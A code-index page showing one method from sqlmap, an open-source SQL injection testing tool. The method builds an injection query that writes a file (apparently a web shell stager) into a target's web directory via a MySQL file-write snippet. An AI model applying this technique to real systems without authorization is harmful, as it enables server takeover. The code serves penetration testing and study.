MCPcopy Index your code
hub / github.com/sqlmapproject/sqlmap / _webFileInject

Method _webFileInject

lib/takeover/web.py:148–165  ·  view source on GitHub ↗
(self, fileContent, fileName, directory)

Source from the content-addressed store, hash-verified

146 return False
147
148 def _webFileInject(self, fileContent, fileName, directory):
149 outFile = posixpath.join(ntToPosixSlashes(directory), fileName)
150 uplQuery = getUnicode(fileContent).replace(SHELL_WRITABLE_DIR_TAG, directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory)
151 query = ""
152
153 if isTechniqueAvailable(getTechnique()):
154 where = getTechniqueData().where
155
156 if where == PAYLOAD.WHERE.NEGATIVE:
157 randInt = randomInt()
158 query += "OR %d=%d " % (randInt, randInt)
159
160 query += getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=outFile, HEXSTRING=encodeHex(uplQuery, binary=False))
161 query = agent.prefixQuery(query) # Note: No need for suffix as 'write_file_limit' already ends with comment (required)
162 payload = agent.payload(newValue=query)
163 page = Request.queryPage(payload)
164
165 return page
166
167 def webInit(self):
168 """

Callers 1

webInitMethod · 0.95

Calls 13

ntToPosixSlashesFunction · 0.90
getUnicodeFunction · 0.90
isTechniqueAvailableFunction · 0.90
getTechniqueFunction · 0.90
getTechniqueDataFunction · 0.90
randomIntFunction · 0.90
getSQLSnippetFunction · 0.90
encodeHexFunction · 0.90
isOsMethod · 0.80
prefixQueryMethod · 0.80
payloadMethod · 0.80
queryPageMethod · 0.80

Tested by

no test coverage detected